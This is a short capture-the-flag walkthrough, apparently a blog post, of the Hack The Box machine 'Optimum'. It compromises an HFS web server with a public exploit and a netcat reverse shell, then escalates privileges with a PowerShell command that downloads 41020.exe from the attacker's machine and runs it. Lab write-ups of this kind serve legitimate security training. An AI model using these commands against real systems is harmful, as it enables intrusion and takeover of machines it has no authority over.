Again, we start with nmap -sC -sV -oA ./optimum -Pn 10.10.10.8
Web only, so far. While I dig into the web portal, I'm going to rescan, but with all ports. The Web Portal seems to be and HTTP File Server (HFS). There's a Metasploit module, but again, Metasploit makes us lazy. Instead, consult the great Google-Fu Master.
Checking out the one from Exploit DB, we can copy the exploit code into our own .py file and the change the IP address to ours. Then we need to start a http.server module on port 80 (sudo python -m http.server 80). Copy the nc.exe binary from /usr/share/windows-resources/binaries/nc.exe to whichever folder you have the http.server running in. Then start a netcat listener on port 443, and run the exploit with:
python ./ex.py 10.10.10.8 80
And with that bit of lovely, we have a shell as Kostas and the User flag. Run systeminfo and then copy and paste the output into a text file on your attacking machine. You're going to need it in a moment.
Run the system info txt file through the Windows Exploit Suggester and you'll see this box is vulnerable to damn near everything. The one that matters though is:
So, we can grab the exploit here. Now, to get it over to the target box and execute it. We can do that with:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.10/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
and then just run it from the target. Grab your root flag and get your party on.